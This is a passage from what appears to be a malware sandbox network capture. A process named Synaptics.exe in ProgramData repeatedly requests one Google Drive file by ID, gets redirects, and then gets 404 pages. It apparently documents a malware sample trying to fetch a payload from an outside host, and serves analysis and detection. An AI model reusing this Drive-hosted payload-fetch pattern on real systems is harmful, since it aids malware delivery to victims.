                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.449754142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:29 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-KRL4-2Mqnc1jfDm2NeBQRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.449766142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:33 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gGgoPzxTzUJTwEkePH_oSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.449767142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:33 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-PXq3L3VJNaPaAegPUcRo4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.449774142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DFN3HbwV1YdvEdrbVMZ-uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.449773142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:35 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-25 08:07:36 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4tfXR_jvBnoOmFWo_EU3txcxA31dCHxmsa1rvlDiKUk8nfIji9ctnaujoLm4XQ9GiJfsnXZGo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-hsfk9xJEsLeQ7fTnu1KYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Set-Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:07:36 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6e 4e 52 58 4d 59 42 6a 68 39 4e 61 7a 30 31 6b 44 65 31 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZnNRXMYBjh9Naz01kDe1qA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                2024-12-25 08:07:36 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.449772142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VX7U5pZz3f6x4oyY7RVnWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.449771142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:35 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-25 08:07:36 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5R9-y2K9Uc1YS28zKzMIjlr5Lsk_SnmicSaIKNBWItdEzvlSkHylIzxn0DZlD-UGVd
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WWK9c0otsDCsIZGODaTMgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Set-Cookie: NID=520=ES8n9cVyCUaunsy6BkYMzsBr24OjOb2KaLrMudzmiicf0zrQxE7a90KFSHonEK3bSfV4GkrhxYVtjQGHgZpQD4LoCKwcaYfpmdNTbAY0-4dqash3ELo436BN2GnWNTjm6pHSD-Mlclev7P-9DqeLvx7P6YWB2_TZmM2MFJL-yCfjy7fWQQmGVhc; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:07:36 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 57 42 71 35 50 50 6e 6a 49 6d 4b 2d 6b 4a 51 6f 72 5f 44 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wWBq5PPnjImK-kJQor_DXw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                2024-12-25 08:07:36 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.449784142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:39 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eGle5Il-NYPLOWKAqkpVCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.449783142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:39 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DzYkfkFn5aMrFOFf0cKVzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.449788142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:41 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XcmUJZvQRmWLvnVJF64-Zw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.449789142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
